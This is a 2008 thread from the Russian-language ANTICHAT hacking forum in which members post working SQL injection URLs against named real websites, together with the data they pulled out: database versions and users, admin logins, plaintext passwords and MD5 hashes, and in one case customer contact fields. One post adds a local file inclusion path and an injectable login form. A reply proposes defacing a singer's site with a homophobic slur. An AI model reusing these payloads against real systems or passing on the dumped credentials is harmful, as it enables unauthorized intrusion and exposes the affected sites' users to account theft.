HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 02.06.2008, 15:32
[aywo]
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307

Репутация: 114
Отправить сообщение для [aywo] с помощью ICQ
По умолчанию

http://old.rusmet.ru/production.php?act=comp&comp_id=-1+union+select+concat_ws(0x3a,database(),user(),ve rsion())/*&data_type=1&page=2
Версия:4.1.22
Пользователь:rusmet@localhost
База:rusmet_comp

http://www.metall.dn.ua/answer.php?id=-1+union+select+concat_ws(0x3a,user(),version(),dat abase()),2/*
Версия:4.1.22
Пользователь:metalpor_metalpo@localhos
База:metalpor_clients

Последний раз редактировалось [aywo]; 02.06.2008 в 16:38..
 
Ответить с цитированием

  #2  
Старый 02.06.2008, 15:54
XTZ
Новичок
Регистрация: 29.09.2007
Сообщений: 1
Провел на форуме:
46683

Репутация: 0
По умолчанию

http://alesya.by/interview.php?act=intview&int=-24+union+select+1,2,3,4,5/*

USER(): u93086@10.10.153.161
DATABASE(): u93086_alesa
VERSION(): 5.0.45-log
 
Ответить с цитированием

  #3  
Старый 02.06.2008, 16:16
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

www.shoesandblues.com

Цитата:
http://www.shoesandblues.com/lovesound/entry.php?id=-99999+union+select+1,2,concat(login,0x3a,password) ,4,5,6,7,8+from+users/*
badlaura:cheney
becc:brian
janee:johnny
zoe:taylor

Цитата:
http://www.shoesandblues.com/lovesound/entry.php?id=-99999+union+select+1,2,concat(author,0x3a,password ,0x3a,id),4,5,6,7,8+from+blog/*
админки не нашёл (
 
Ответить с цитированием

  #4  
Старый 02.06.2008, 16:28
КВР
Познающий
Регистрация: 23.04.2008
Сообщений: 39
Провел на форуме:
198086

Репутация: 135
По умолчанию

Как поеметь Диму Билана ?(www.bilandima.ru)
А вот и ответ:
способ номер раз : анальный =)
SQL #1
Требует рeгу.
http://www.bilandima.ru/friendsclub/userinfo.php?id=0'+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3a ,version(),database(),user()),23,24,25,26,27,28/*
Способ номер два: анальный с прибамбасом =)
SQL#2
http://www.bilandima.ru/friendsclub/

Электронная почта
E-mail

Пароль
Password

подставляем " ' " и емеем

Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 1

Cпособ #3
Емеем в рот =)

(Local include)

http://www.bilandima.ru/html/promofoto.php?p=../../fotoalbum/fotos/209_oslo/001s.jpg%00

И незабудь резину (Proxy)

Web-defence.ru
 
Ответить с цитированием

  #5  
Старый 08.06.2008, 21:46
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Цитата:
Сообщение от КВР  
Как поеметь Диму Билана ?(www.bilandima.ru)
А вот и ответ:
способ номер раз : анальный =)
SQL #1
Требует рeгу.
http://www.bilandima.ru/friendsclub/userinfo.php?id=0'+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3a ,version(),database(),user()),23,24,25,26,27,28/*
Способ номер два: анальный с прибамбасом =)
SQL#2
http://www.bilandima.ru/friendsclub/

Электронная почта
E-mail

Пароль
Password

подставляем " ' " и емеем

Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 1

Cпособ #3
Емеем в рот =)

(Local include)

http://www.bilandima.ru/html/promofoto.php?p=../../fotoalbum/fotos/209_oslo/001s.jpg%00

И незабудь резину (Proxy)

Web-defence.ru
Ахха, надо дефейсануть этот сайт и написать от Отара Кушанашвили:
Рудковская гений. Билан - Лучший певец. Только ПИДАРАЗ!
 
Ответить с цитированием

  #6  
Старый 02.06.2008, 16:35
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию

_http://www.btl.ru/interview-details.php?id=-1+union+select+1,2,3,password+from+_manager/*
version():5.0.45-log
pass:a86aea5517a58dd5674aa8dd89337e03
Ps:Есть также табла "users"
Цитата:
http://www.btl.ru/interview-details.php?id=-1+union+select+1,2,3,concat_ws(0x3a,name,email,add ress,phone,rank)+from+users+limit+1,1/*
Цитата:
http://www.btl.ru/admin/
Pss:_http://www.btl.ru/interview-details.php?id=-1+union+select+1,2,login,password+from+passwords+l imit+0,1/*
 
Ответить с цитированием

  #7  
Старый 02.06.2008, 16:55
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

www.semplice.it

Цитата:
http://www.semplice.it/cucina_scheda.php?id=-99999+union+select+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9/*
5.0.45:cucina@semplice.village.it:cucina

Цитата:
http://www.semplice.it/cucina_scheda.php?id=-99999+union+select+1,TABLE_NAME,3,4,5,6,7,8,9+FROM +INFORMATION_SCHEMA.TABLES+limit+17,1/*
 
Ответить с цитированием

  #8  
Старый 02.06.2008, 23:53
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698

Репутация: 1446


Отправить сообщение для Momiji с помощью ICQ
По умолчанию

telematrixusa.com
Код:
http://www.telematrixusa.com/index.php?id=999+union+select+concat(0x626C61626C61,0x3,version(),user(),database())/*
5.0.45-community-nt-logtelmtrxusa@localhosttelematrix
Код:
http://www.telematrixusa.com/index.php?id=999+union+select+concat(0x626C61626C61,0x3,username,0x3,password)+from+admin/*
webadminwebdemo
http://www.telematrixusa.com/siteadmin
 
Ответить с цитированием

  #9  
Старый 03.06.2008, 17:12
bakl
Новичок
Регистрация: 29.05.2008
Сообщений: 12
Провел на форуме:
134986

Репутация: 13
Post

http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+1/*


database: bsigroup_out
version: 5.0.22
user: bsigroup_newwww@localhost

P.S. есть таблица _system_user Поля(_Name,_status,_login_xz,_pass_xz)

Код:
http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+_login_xz+from+_system_user/*
P.P.S. Сам не до крутил её , кто найдёт что интересно киньтесь плз на мыло)) так не сайт нужен просто интересно чё от туда можно вытащить было.
 
Ответить с цитированием

  #10  
Старый 03.06.2008, 17:47
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

Цитата:
Сообщение от bakl  
http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+1/*


database: bsigroup_out
version: 5.0.22
user: bsigroup_newwww@localhost

P.S. есть таблица _system_user Поля(_Name,_status,_login_xz,_pass_xz)

Код:
http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+_login_xz+from+_system_user/*
P.P.S. Сам не до крутил её , кто найдёт что интересно киньтесь плз на мыло)) так не сайт нужен просто интересно чё от туда можно вытащить было.
Цитата:
http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+concat_ws(0x3a,_name,_login_xz,_pas s_xz)+from+_system_user+where+_system_user_id=1/*
Super User:root:89905f508ebdc32e7eb0c24fdb118305

логин был зашифрован в md5 )

Последний раз редактировалось ~!DoK_tOR!~; 03.06.2008 в 18:09..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ